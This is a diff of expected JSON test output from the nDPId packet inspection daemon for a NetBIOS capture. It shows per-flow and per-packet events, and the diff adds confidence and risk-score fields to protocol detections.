-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772210350,"flow_last_seen":1447772210350,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772210350,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772210350,"flow_last_seen":1447772210350,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772210350,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1447772210821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772210821,"pkt":"\/\/\/\/\/\/\/\/ABj+bLz3CABFAABOYvkAAIARuSQKAASDCgAF\/wCJAIkAOr8dp0oBEAABAAAAAAAAIEZJRkRGRUZDRUZFQkVORlBFSUZKQ0FDQUNBQ0FDQUFBAAAgAAE="}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1447772210835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772210835,"pkt":"\/\/\/\/\/\/\/\/ABj+bLz3CABFAABOYvoAAIARuSMKAASDCgAF\/wCJAIkAOr8fp0gBEAABAAAAAAAAIEZJRkRGRUZDRUZFQkVORlBFSUZKQ0FDQUNBQ0FDQUFBAAAgAAE="}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772211392,"flow_last_seen":1447772211392,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772211392,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1447772211392,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772211392,"pkt":"\/\/\/\/\/\/\/\/AOCBt8asCABFAABOKuIAAIAR79UKAAXpCgAF\/wCJAIkAOuD1mh4BEAABAAAAAAAAIEVQRktFSkNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUJNAAAgAAE="}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772211392,"flow_last_seen":1447772211392,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772211392,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772211392,"flow_last_seen":1447772211392,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772211392,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1447772212142,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772212142,"pkt":"\/\/\/\/\/\/\/\/AOCBt8asCABFAABOLrMAAIAR7AQKAAXpCgAF\/wCJAIkAOuD1mh4BEAABAAAAAAAAIEVQRktFSkNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUJNAAAgAAE="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1447772212892,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772212892,"pkt":"\/\/\/\/\/\/\/\/AOCBt8asCABFAABOMrEAAIAR6AYKAAXpCgAF\/wCJAIkAOuD1mh4BEAABAAAAAAAAIEVQRktFSkNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUJNAAAgAAE="}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1447772214344,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1447772214344,"pkt":"\/\/\/\/\/\/\/\/ADBIsLGUCABFAADlUKwAAIARylQKAAUJCgAF\/wCKAIoA0VBGEQ7C9AoABQkAigC7AAAgRU9GR0ZDREpDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZHRUpFSEVKRU1FQkVPRkVGUEVIRkNFUEZGRkFDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoATlZSOQAAAAAAAAAAAAAAAAYBBxABAA8BVaoA"}
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"ts_msec":1447772216537,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"ts_msec":1447772216537,"pkt":"ABj+bLz3ABzEEHkPCABFAAApQatAAIAGnIkKAAQYCgAEgwCLBXatXRk68Re6KFAQ96kjtgAAAAAAAAAA"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1447772216537,"pkt":"ABzEEHkPABj+bLz3CABFAAAoY6dAAIAGeo4KAASDCgAEGAV2AIvxF7oorV0ZO1AQ+ycgOAAAAAAAAAAA"}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1447772221776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772221776,"pkt":"ABzEEHkPACFislxDCABFAABOBFAAAH8RHeEKAAFXCgAEGOHsAIkAOqS0IKgAAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1447772221776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1447772221776,"pkt":"ACFislxDABzEEHkPCABFAADLdA9AAIARbKQKAAQYCgABVwCJ4ewAt5RIIKiEAAAAAAEAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAEAAAAAAHcER1VOTkFSICAgICAgICAgAAQAVklHSUxBTlRfR1JPVVAgAIQAR1VOTkFSICAgICAgICAgIAQAVklHSUxBTlRfR1JPVVAgHoQAABzEEHkPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221882,"flow_last_seen":1447772221882,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772221882,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1447772221882,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772221882,"pkt":"\/\/\/\/\/\/\/\/AOCBdSQGCABFAABOIosAAIAR+bAKAARlCgAF\/wCJAIkAOuxhlzUBEAABAAAAAAAAIEVORkZFTUVKQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221882,"flow_last_seen":1447772221882,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772221882,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221882,"flow_last_seen":1447772221882,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772221882,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1447772225411,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772225411,"pkt":"\/\/\/\/\/\/\/\/AOCBt3SFCABFAABOYEAAAIARu7sKAASlCgAF\/wCJAIkAOvrLhIYBEAABAAAAAAAAIEVIRkZFT0VPRUJGQ0NBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1447772225411,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"ts_msec":1447772225411,"pkt":"AOCBt3SFABzEEHkPCABFAABaEmgAAIARC28KAAQYCgAEpQCJAIkARtanhIaFAAAAAAEAAAAAIEVIRkZFT0VPRUJGQ0NBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAEABJPgAAYAAAoABBg="}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772230221,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1447772230221,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772230221,"pkt":"\/\/\/\/\/\/\/\/ABj+KG95CABFAABOBVEAAIARFw4KAARCCgAF\/wCJAIkAOg\/qh84BEAABAAAAAAAAIEVIRkZGQ0ZGQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772230221,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772230221,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1447772234353,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772234353,"pkt":"\/\/\/\/\/\/\/\/ABzEEHkPCABFAABOQtEAAIAR2bcKAAQYCgAF\/wCJAIkAOvkLntYBEAABAAAAAAAAIEVIRkZGQ0ZGQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1447772234353,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"ts_msec":1447772234353,"pkt":"ABzEEHkP7Khr9GB3CABFAABaM4kAAIAR6fEKAAUBCgAEGACJAIkARtMVntaFAAAAAAEAAAAAIEVIRkZGQ0ZGQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAEABJPgAAYAAAoABQE="}
